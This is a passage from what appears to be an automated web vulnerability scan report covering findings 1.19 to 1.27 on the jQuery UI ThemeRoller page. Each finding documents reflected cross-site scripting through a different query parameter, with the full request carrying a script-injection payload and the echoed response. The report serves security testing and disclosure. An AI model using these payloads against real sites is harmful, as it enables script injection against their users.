The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bd2c"><script>alert(1)</script>14d61402d9b was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=06bd2c"><script>alert(1)</script>14d61402d9b&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:33:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
03e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=06bd2c"><script>alert(1)</script>14d61402d9b&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.19. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3404"><script>alert(1)</script>60ea8a71583 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.pngb3404"><script>alert(1)</script>60ea8a71583&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:28:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120033

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
conColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.pngb3404"><script>alert(1)</script>60ea8a71583&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighl
...[SNIP]...

1.20. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a515b"><script>alert(1)</script>de3e563a943 was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.pnga515b"><script>alert(1)</script>de3e563a943&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:25:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120033

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
us=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.pnga515b"><script>alert(1)</script>de3e563a943&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=5
...[SNIP]...

1.21. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2a0b"><script>alert(1)</script>4f33de6bd13 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.pngd2a0b"><script>alert(1)</script>4f33de6bd13&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:26:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120033

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
er=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.pngd2a0b"><script>alert(1)</script>4f33de6bd13&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&icon
...[SNIP]...

1.22. http://jqueryui.com/themeroller/ [bgTextureError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfc88"><script>alert(1)</script>26ccc18bbb was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.pngcfc88"><script>alert(1)</script>26ccc18bbb&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:30:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120031

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.pngcfc88"><script>alert(1)</script>26ccc18bbb&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextu
...[SNIP]...

1.23. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc6ff"><script>alert(1)</script>7761c2c16e6 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.pngcc6ff"><script>alert(1)</script>7761c2c16e6&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:24:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120033

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r/css/parseTheme.css.php?ctl=themeroller&ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.pngcc6ff"><script>alert(1)</script>7761c2c16e6&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101
...[SNIP]...

1.24. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92262"><script>alert(1)</script>3bf54c79764 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png92262"><script>alert(1)</script>3bf54c79764&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:29:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120033

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ver=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png92262"><script>alert(1)</script>3bf54c79764&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a12
...[SNIP]...

1.25. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a97f7"><script>alert(1)</script>27d3858697 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.pnga97f7"><script>alert(1)</script>27d3858697&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:27:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120031

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ntent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.pnga97f7"><script>alert(1)</script>27d3858697&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconCol
...[SNIP]...

1.26. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f48c"><script>alert(1)</script>be4bd7ca47a was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png5f48c"><script>alert(1)</script>be4bd7ca47a&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:32:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120033

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png5f48c"><script>alert(1)</script>be4bd7ca47a&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadi
...[SNIP]...

1.27. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d8aa"><script>alert(1)</script>a079cdcb31f was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.p